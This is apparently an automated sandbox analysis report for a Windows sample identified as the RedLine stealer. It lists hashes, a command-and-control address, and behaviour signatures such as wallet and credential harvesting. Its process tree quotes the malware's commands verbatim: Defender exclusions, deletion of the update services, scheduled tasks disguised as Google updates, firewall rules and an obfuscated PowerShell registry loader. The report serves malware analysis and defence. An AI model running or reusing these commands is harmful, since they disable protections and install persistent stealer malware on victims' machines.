Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
247s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
-
submitted
01/11/2022, 09:57
General
-
Target
72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe
-
Size
2.4MB
-
MD5
2e741b20a9b1a20eb723e30d8f0ce395
-
SHA1
7bf2f2a5c210ab1d4b1b70b8541550193924722b
-
SHA256
72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7
-
SHA512
f946462ef91f5c2f0486d195e51ea3f7694a68797ee0f1910e2e518de1221023ef003772d9d1f3adf0c7d321435085dde6a3b262c65c953060282167a73dc5b9
-
SSDEEP
24576:nZAsE+YcYdlNbgwM1/lc+7+F+NalOxkey5mILPKTLfSzvHmh/NeCql3RuQ55313S:esgT+85mILPKTkDl3o
Malware Config
Extracted
redline
62.204.41.141:24758
-
auth_value
3635ab4d86c01914c9036a302ef7c402
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
-
Modifies Windows Firewall 1 TTPs 3 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 2 IoCs
Detects executables packed with VMProtect commercial packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 6 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 5 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2288c2a9-1480-444e-8cb4-66d468cf8920}2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{fb470cb7-45b1-4ca8-919b-95242dcb6749}2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe"C:\Users\Admin\AppData\Local\Temp\72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\brave.exe"C:\Users\Admin\AppData\Local\Microsoft\brave.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f6⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Drops file in Windows directory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\Windows\GoogleUpdate.exeC:\Windows\GoogleUpdate.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL6⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes6⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes6⤵
- Modifies Windows Firewall
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f6⤵
- Creates scheduled task(s)
-
-
-
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4016 -s 7842⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3692 -s 9002⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3692 -s 8802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exeC:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe2⤵
- Executes dropped EXE
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
31KB
MD59c4e110de44866acf9b4ee267a5599f5
SHA12f151d44c2c9db25d9fdc07a467109eb9576f1fd
SHA25606e38aed92021d745df94f95b4c01210f89c2baba463d0055f4f838ca2b58d4c
SHA5129c6e3e7c1f9a3837207d6fda3515c41ace79662fa44e071af677c62b26155b6174b9c67db8252098101d6f74ebf8862a8957104de015ba0391d1939c6096b976
-
Filesize
12KB
MD5a225aa7dbf256124250b8fa976368c84
SHA1945a54350e50352d35ecb2bb5118c2b118d28c40
SHA256b90cd6e83593579622bfa0c093fd9c02b2059ed1b4e593445253cc5c884b9b51
SHA512099462fa8cbfd1978d75246fddf7122584de619a56b0251ca9de396061da9d4629d6e2d3aa868c42c01efa9260249a056445720b66ba5a154a7f20befb16ef9d
-
Filesize
30KB
MD5a5a9255a5ef54b88009a8b493f3f4651
SHA16b2e85b886de66d1243c4889d4e816ea4963e504
SHA256dcbf284ed543a34630f6aafbe10284587d69d0cd84aab8ec60eb2c836f2fb1bd
SHA5128db5d36d1cf7ff8d6096c05b33a4a99314b0f7554adc2156e59c3a8f1c2d4b66030cda4b96fd7e186e77d20a2447e8695e8ecac46c6d7979190f863316ada5a7
-
Filesize
12KB
MD536d250398c50ce2d8846d09c88303307
SHA1b8ebd2fb6d345b01280a0efebca099a900645278
SHA256aeb25a204c325b87d5756d16a700ee430df5bc02688f9b230505efefd267f09a
SHA51220bb8965b6cda05e90b2a2bc127a00ad8f2828e8cf7f771f07b7d2e3ae582fb65ad44a95650d1ac7a389146fec1128f8bd7fd28569832560ae53442f68a10257
-
Filesize
340B
MD519bb4e88d3252deeb1ba8834383e6172
SHA156883a52c578dc58bfde0caf023f7970a061dceb
SHA256091926f5f0e29c83040d17a5a00545723f4ad375596271e5e2bc67f5bf3914d8
SHA512246ecd5c5a00a1faae7d273ea342843e4f685ebf84aeffc41228beff315a51c0ca693c97577e8ebbb061224ef5800758344c1da4b040650b15618d68c7f14a5f
-
Filesize
438B
MD5642d91000b3fc29937fa4b4fa462b3f6
SHA156752ccdaa97ffabb4dd3a4d64b85393383616bd
SHA2563323f429687ed106269e6d77363a30a778717e72aa678434e12111951ab7e6ef
SHA512f074d55da4c1571619215446f694d7f8e602d3f4376b0252248fbd53bf5fe845110ff36c8709664d554724f75cbc1a7dd9465ff8ae2b4e29efa5a3c2a1267ad7
-
Filesize
426B
MD5a91764fc890367c743dc2220b868b89b
SHA1ce5bcb240451215698990d2199ce639c4786d4f1
SHA25690884e53c54de7ee398b5df55963b754e89aa6c527747f5fb0f65f2186bd8234
SHA5123fa881eda3802938794c5dc0c57bcbc11c544bf99371e6b3801078e66d544d03b0473ac060b196231ef46220975e0f7e3c46c7e3c81d344d9b99f85dc3d0432d
-
Filesize
3KB
